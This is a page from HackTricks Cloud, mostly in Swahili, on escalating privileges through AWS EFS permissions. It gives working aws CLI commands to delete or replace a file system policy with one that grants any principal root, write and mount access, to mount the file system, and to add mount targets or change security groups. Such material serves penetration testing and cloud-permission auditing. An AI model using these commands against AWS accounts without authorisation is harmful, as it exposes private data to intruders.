AWS - EFS Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EFS

More info about EFS in:

AWS - EFS Enum

Kumbuka kwamba ili kuunganisha EFS unahitaji kuwa katika subnetwork ambapo EFS imewekwa wazi na kuwa na ufikiaji kwake (vikundi vya usalama). Ikiwa hii inatokea, kwa kawaida, utaweza kuunganisha kila wakati, hata hivyo, ikiwa inprotected na sera za IAM unahitaji kuwa na ruhusa za ziada zilizotajwa hapa ili kuweza kuzipata.

`elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`

Kwa ruhusa yoyote kati ya hizo mshambuliaji anaweza kubadilisha sera ya mfumo wa faili ili kukupa ufikiaji kwake, au tu kuifuta ili ufikiaji wa kawaida upatikane.

Ili kufuta sera:

aws efs delete-file-system-policy \
--file-system-id <value>

Ili kubadilisha:

aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}

`elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`

Kwa ruhusa hii, mshambuliaji ataweza kuunganisha EFS. Ikiwa ruhusa ya kuandika haitolewi kwa default kwa kila mtu anayeweza kuunganisha EFS, atakuwa na ufikiaji wa kusoma tu.

sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

The extra permissions elasticfilesystem:ClientRootAccess and elasticfilesystem:ClientWrite can be used to write inside the filesystem after it's mounted and to access that file system as root.

Madhara Yanayoweza Kutokea: Indirect privesc kwa kutafuta taarifa nyeti katika mfumo wa faili.

`elasticfilesystem:CreateMountTarget`

Ikiwa wewe ni mshambuliaji yuko ndani ya subnetwork ambapo hakuna mount target ya EFS inapatikana. Anaweza tu kuunda moja katika subnet yake kwa ruhusa hii:

# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>

Madhara Yanayoweza Kutokea: Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika mfumo wa faili.

`elasticfilesystem:ModifyMountTargetSecurityGroups`

Katika hali ambapo mshambuliaji anapata kwamba EFS ina lengo la kuunganisha katika mtandao wake wa ndani lakini hakuna kundi la usalama linaloruhusu trafiki, anaweza tu kubadilisha hilo kwa kubadilisha makundi ya usalama yaliyochaguliwa:

aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>

Madhara Yanayoweza Kutokea: Privesc isiyo ya moja kwa moja kwa kutafuta taarifa nyeti katika mfumo wa faili.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - ECS Privesc NextAWS - Elastic Beanstalk Privesc

Last updated 1 month ago